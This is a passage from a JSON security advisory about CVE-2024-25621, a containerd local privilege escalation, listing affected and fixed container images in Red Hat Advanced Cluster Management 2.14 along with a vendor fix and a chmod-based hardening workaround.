"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-25621",
"cwe": {
"id": "CWE-279",
"name": "Incorrect Execution-Assigned Permissions"
},
"discovery_date": "2025-11-06T19:01:04.402278+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2413190"
}
],
"notes": [
{
"category": "description",
"text": "A local privilege escalation vulnerability has been discovered in containerd. This vulnerability is the result of an overly broad default permission which allows local users on the host to potentially access the metadata store, the content store and the contents of Kubernetes local volumes. The contents of volumes might include setuid binaries, which could allow a local user on the host to elevate privileges on the host.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/containerd/containerd: containerd local privilege escalation",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-25621"
},
{
"category": "external",
"summary": "RHBZ#2413190",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2413190"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-25621",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25621"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-25621",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25621"
},
{
"category": "external",
"summary": "https://github.com/containerd/containerd/blob/main/docs/rootless.md",
"url": "https://github.com/containerd/containerd/blob/main/docs/rootless.md"
},
{
"category": "external",
"summary": "https://github.com/containerd/containerd/commit/7c59e8e9e970d38061a77b586b23655c352bfec5",
"url": "https://github.com/containerd/containerd/commit/7c59e8e9e970d38061a77b586b23655c352bfec5"
},
{
"category": "external",
"summary": "https://github.com/containerd/containerd/security/advisories/GHSA-pwhc-rpq9-4c8w",
"url": "https://github.com/containerd/containerd/security/advisories/GHSA-pwhc-rpq9-4c8w"
}
],
"release_date": "2025-11-06T18:36:21.566000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T20:51:55+00:00",
"details": "For release note details, see the upstream Submariner release notes:\n\nhttps://submariner.io/community/releases/\n\nDownstream-specific issues resolved:\n* ACM-27238\n* ACM-28294\n* ACM-28295\n* ACM-28311\n* ACM-28313\n* ACM-28314\n* ACM-28315\n* ACM-28316\n* ACM-28329\n* ACM-28331\n* ACM-28333\n* ACM-28335\n* ACM-28337\n* ACM-28339\n* ACM-28342\n* ACM-29317\n* ACM-29511\n* ACM-29613\n* ACM-29614\n* ACM-29631\n* ACM-29632\n* ACM-29633\n* ACM-29634\n* ACM-29776\n* ACM-30134\n* ACM-30726\n* ACM-30727\n* ACM-30728\n* ACM-30729\n* ACM-30970\n* ACM-31136\n* ACM-31831\n* ACM-31840\n* ACM-32575\n* ACM-32842\n* ACM-34108\n* ACM-34586\n* ACM-34589\n\nFor more details, see the Red Hat Advanced Cluster Management for Kubernetes documentation:\n\nhttps://docs.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.14/",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25127"
},
{
"category": "workaround",
"details": "The system administrator on the host can manually chmod the directories to not\nhave group or world accessible permissions:\n```\nchmod 700 /var/lib/containerd\nchmod 700 /run/containerd/io.containerd.grpc.v1.cri\nchmod 700 /run/containerd/io.containerd.sandbox.controller.v1.shim\n```\nAn alternative mitigation would be to run containerd in rootless mode.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
